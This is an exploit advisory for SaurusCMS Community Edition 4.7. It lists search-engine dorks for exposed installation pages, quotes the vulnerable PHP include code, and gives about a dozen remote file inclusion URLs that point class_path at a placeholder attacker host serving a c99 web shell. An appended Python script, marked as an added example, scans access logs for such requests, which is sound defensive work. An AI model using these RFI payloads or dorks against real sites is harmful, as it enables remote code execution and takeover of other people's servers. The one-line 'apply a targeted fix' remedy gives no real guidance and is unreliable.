Title     : SaurusCMS-CE (CommunityEdition) v4.7 Multiple Vulnerabilities
Author    : KedAns-Dz
Platform  : php
Type      : Multiple RFI
Tested on : Windows XP SP3 (en)
Download  : [http://www.saurus.info/download/SaurusCMSCommunityEdition.zip]
# Gr33ts t0 { Kha&miX }
-------------------------------------------------------------------------
<+> (1) Installation file disclosure :
-------------------------------------------------------------------------
+> allintitle:"Saurus CMS CE Installation"
+> site:[www.2cto.com] allintitle:"Saurus CMS CE Installation"
--------------------------------------------------------------------------
<+> (2) Multiple RFI :
--------------------------------------------------------------------------
[ PHP Code (1) =>
$class_path = $matches[1] == "editor" ? "classes/" : "./classes/";
include($class_path."port.inc.php");
<= END Code ]
http://www.2cto.com /[path]/file.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/image.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/doc.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/com_del.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/form.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/file.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/image.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/doc.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/com_del.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/form.php?class_path=http://Ev!l/c99.txt?
--------------------------------------------------------------------------
[ PHP Code (2) =>
include_once($class_path."timer.class.php");
if ($debug) {
    include_once($class_path."debug.inc.php");
} else {
    include_once($class_path."nodebug.inc.php");
}
include_once($class_path."config.class.php");
<= END Code ]
http://www.2cto.com /[path]/styles.php?class_path=http://Ev!l/c99.txt?
http://www.2cto.com /[path]/editor/styles.php?class_path=http://Ev!l/c99.txt?
--------------------------------------------------------------------------
Fix: apply a targeted fix.
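One way to look for the requests listed above in web server access logs, as an added example that is not part of the original advisory or of SaurusCMS. The script names and the class_path parameter come from the advisory's URLs; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names and the parameter name come from the URLs listed in the advisory.
SCRIPTS = {"file.php", "image.php", "doc.php", "com_del.php", "form.php", "styles.php"}
PARAM = "class_path"
# A scheme (http:, ftp:, php:, data: ...), "//host" or a UNC prefix means the
# include prefix is being pointed away from the local classes/ directory.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def class_path_overrides(line):
    """Return the class_path values in one log line that look like remote locations."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1].lower() not in SCRIPTS:
        return []
    # parse_qsl percent-decodes, so class_path=http%3A%2F%2F... is caught too.
    return [value for key, value in parse_qsl(url.query, keep_blank_values=True)
            if key.lower() == PARAM and REMOTE.match(value)]


def scan(lines):
    """Return (line_number, value) for every request that overrides class_path."""
    return [(n, value)
            for n, line in enumerate(lines, 1)
            for value in class_path_overrides(line)]


# Constructed sample lines, not real traffic; example.invalid is a placeholder host.
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cms/editor/file.php?class_path=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /cms/styles.php?class_path=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cms/styles.php?id=3 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cms/form.php?class_path=classes/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE):
        print(f"line {n}: class_path points to {value!r}")
```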